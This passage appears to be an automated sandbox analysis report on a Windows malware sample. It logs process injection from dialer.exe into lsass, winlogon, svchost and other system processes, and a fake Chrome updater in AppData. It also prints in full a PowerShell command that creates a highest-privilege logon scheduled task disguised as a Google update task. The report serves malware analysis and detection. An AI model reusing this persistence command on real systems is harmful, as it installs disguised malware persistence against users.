                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 182924D0000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 28471250000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB3D3C0000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29ABCEE0000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2EA8A6E0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 1CB33910000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26E033A0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1C6CEF40000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25305540000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16C21190000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26F48170000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29B92370000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20422AD0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20628E80000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18292570000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB3DA90000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29ABCF10000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD9AD50000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AF8C360000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 145854A0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2CC6C080000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A6E9540000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BC418A0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19D14D00000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2251FF40000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24CD3730000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2259C5B0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23504770000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22903F80000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2158FFB0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FD855A0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2995E1C0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A880020000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: E60000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E5EB130000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13949580000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 295CE1B0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2251A000000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2481AE30000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0873D0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 2527E340000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20217280000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26C3B960000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB42B30000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19116860000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28D05730000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E30EAE0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 238FF4E0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D509FC0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1DC06A00000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15E4FFA0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C4A5A70000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14D18D60000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23CDFD30000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B7A1980000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1A53D510000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E88D40000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 8EC0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C72BA0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CF2C040000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2B555D60000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 18EDC3D0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 153541C0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20B142B0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 225E6D70000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 195B0560000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 219434A0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2B118D70000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F933320000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F9683C0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1E47CB90000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2673DA80000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 21A21380000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1CE44C00000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 155B4770000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 255FC740000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22D3F800000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 28471970000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C3A67E0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 25E81DA0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC1A070000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1AE13BC0000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 21FBD160000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 20C8C170000 value starts with: 4D5A
                Source: C:\Windows\System32\dialer.exeMemory written: PID: 2592 base: 8EC0000 value: 4D
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonlyJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonlyJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeSection loaded: NULL target: unknown protection: readonlyJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeSection loaded: NULL target: unknown protection: readonlyJump to behavior
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeThread register set: target process: 8108Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeThread register set: target process: 7816Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeThread register set: target process: 1184Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeThread register set: target process: 1180Jump to behavior
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeMemory written: C:\Windows\System32\dialer.exe base: 2B90112010Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2EA8A660000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 1CB338B0000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26E02790000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1C6CEEE0000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25304F80000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16C21130000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26F47BD0000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29B91DD0000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 204227B0000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20628780000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 182924D0000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 28471250000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB3D3C0000Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29ABCEE0000Jump to behavior
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 204227F0000Jump to behavior
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2481ADF0000Jump to behavior
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2481AA00000Jump to behavior
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2481AA00000Jump to behavior
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2481AA00000Jump to behavior
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2481AA00000Jump to behavior
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2481AA00000Jump to behavior
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2481AA00000Jump to behavior
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2481AA00000Jump to behavior
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2481AA00000Jump to behavior
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2481AA00000Jump to behavior
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2481AA00000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: 28B4362010Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: 5D09B7E010Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: 5CC55C4010Jump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2EA8A6E0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 1CB33910000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26E033A0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1C6CEF40000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25305540000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16C21190000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26F48170000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29B92370000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20422AD0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20628E80000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18292570000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB3DA90000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29ABCF10000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD9AD50000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AF8C360000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 145854A0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2CC6C080000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A6E9540000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BC418A0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19D14D00000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2251FF40000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24CD3730000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2259C5B0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23504770000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22903F80000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2158FFB0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FD855A0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2995E1C0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A880020000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: E60000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E5EB130000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13949580000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 295CE1B0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2251A000000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2481AE30000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0873D0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 2527E340000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20217280000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26C3B960000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB42B30000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19116860000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28D05730000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E30EAE0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 238FF4E0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D509FC0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1DC06A00000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15E4FFA0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C4A5A70000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14D18D60000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23CDFD30000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B7A1980000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1A53D510000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E88D40000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 8EC0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C72BA0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CF2C040000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2B555D60000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 18EDC3D0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 153541C0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20B142B0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 225E6D70000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 195B0560000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 219434A0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2B118D70000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F933320000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F9683C0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1E47CB90000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2673DA80000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 21A21380000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1CE44C00000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 155B4770000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 255FC740000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22D3F800000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 28471970000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C3A67E0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 25E81DA0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC1A070000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1AE13BC0000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 21FBD160000
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 20C8C170000
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: unknown unknownJump to behavior
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#polrad#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'googleupdatetaskmachineqc' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -runlevel 'highest' -force; }
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#polrad#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'googleupdatetaskmachineqc' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -runlevel 'highest' -force; }
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#polrad#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'googleupdatetaskmachineqc' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -runlevel 'highest' -force; }Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#polrad#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'googleupdatetaskmachineqc' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -runlevel 'highest' -force; }Jump to behavior
                Source: C:\Windows\System32\dialer.exeCode function: 5_2_00007FF67E6C1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,5_2_00007FF67E6C1C64
                Source: C:\Windows\System32\dialer.exeCode function: 5_2_00007FF67E6C1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,5_2_00007FF67E6C1C64
                Source: dwm.exe, 0000000B.00000002.2683605583.000001C6C8720000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000000B.00000000.1359737215.000001C6C8720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: winlogon.exe, 00000008.00000000.1345809971.000002EA8AB50000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2652974543.000002EA8AB50000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000B.00000002.2689611402.000001C6C8D50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: winlogon.exe, 00000008.00000000.1345809971.000002EA8AB50000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2652974543.000002EA8AB50000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000B.00000002.2689611402.000001C6C8D50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: winlogon.exe, 00000008.00000000.1345809971.000002EA8AB50000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2652974543.000002EA8AB50000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000B.00000002.2689611402.000001C6C8D50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: winlogon.exe, 00000008.00000000.1345809971.000002EA8AB50000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2652974543.000002EA8AB50000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000B.00000002.2689611402.000001C6C8D50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A6714A0 cpuid 8_2_000002EA8A6714A0
